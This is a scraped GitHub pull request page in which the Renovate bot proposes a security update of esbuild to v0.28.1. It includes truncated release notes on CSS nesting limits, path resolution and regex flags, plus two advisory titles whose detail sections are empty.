With this release, esbuild will now fail with an error if there is too much CSS nesting expansion. This can happen when nested CSS is converted to CSS without nesting for older browsers as expanding CSS nesting is inherently exponential due to the resulting combinatorial explosion. The expansion limit is currently hard-coded and cannot be changed, but is extremely unlikely to trigger for real code. It exists to prevent esbuild from using too much time and/or memory. Here's an example:
```
a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{color:red}}}}}}}}}}}}}}}}}}}}
```
Previously, transforming this file with --target=safari1 took 5 seconds and generated 40mb of CSS. Trying to do that will now generate the following error instead:
```
✘ [ERROR] CSS nesting is causing too much expansion

    example.css:1:60:
      1 │ a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{a,b{color:red}}}}}}}}}}}}}}}}}}}}
        ╵                                                             ^

  CSS nesting expansion was terminated because a rule was generated with 65536 selectors. This limit
  exists to prevent esbuild from using too much time and/or memory. Please change your CSS to use
  fewer levels of nesting.
```
Fix path resolution edge case (#4144)

This fixes an edge case where esbuild's path resolution algorithm could deviate from node's path resolution algorithm. It involves a confusing situation where a directory shares the same file name as a file (but without the file extension). See the linked issue for specific details. This appears to be a case where esbuild is correctly following node's published resolution algorithm but where node itself is doing something different. Specifically the step LOAD_AS_FILE appears to be skipped when the input ends with ... This release changes esbuild's behavior for this edge case to match node's behavior.
Update Go from 1.23.7 to 1.23.8 (#4133, #4134)

This should have no effect on existing code as this version change does not change Go's operating system support. It may remove certain reports from vulnerability scanners that detect which version of the Go compiler esbuild uses, such as for CVE-2025-22871.

As a reminder, esbuild's development server is intended for development, not for production, so I do not consider most networking-related vulnerabilities in Go to be vulnerabilities in esbuild. Please do not use esbuild's development server in production.

`v0.25.2`

Compare Source

Support flags in regular expressions for the API (#4121)

The JavaScript plugin API for esbuild takes JavaScript regular expression objects for the filter option. Internally these are translated into Go regular expressions. However, this translation previously ignored the flags property of the regular expression. With this release, esbuild will now translate JavaScript regular expression flags into Go regular expression flags. Specifically the JavaScript regular expression /\.[jt]sx?$/i is turned into the Go regular expression `(?i)\.[jt]sx?$` internally inside of esbuild's API. This should make it possible to use JavaScript regular expressions with the i flag. Note that JavaScript and Go don't support all of the same regular expression features, so this mapping is only approximate.
Fix node-specific annotations for string literal export nam

✂ Note

PR body was truncated to here.

Configuration

📅 Schedule: (in timezone UTC)

Branch creation
- At any time (no schedule defined)
Automerge
- At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

Update dependency esbuild to v0.28.1 [SECURITY]

a7034b2

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Update dependency esbuild to v0.28.1 [SECURITY]#334

Update dependency esbuild to v0.28.1 [SECURITY]#334
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-esbuild-vulnerability

renovate Bot commented Jun 12, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

Conversation

renovate Bot commented Jun 12, 2026

esbuild enables any website to send any requests to the development server and read the response

Details

Summary

Details

PoC

Impact

Severity

References

esbuild: Missing binary integrity verification in Deno module enables remote code execution via NPM_CONFIG_REGISTRY

Details

Summary

Details

PoC

Impact

Suggested remediation

Severity

References

Release Notes

Configuration

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants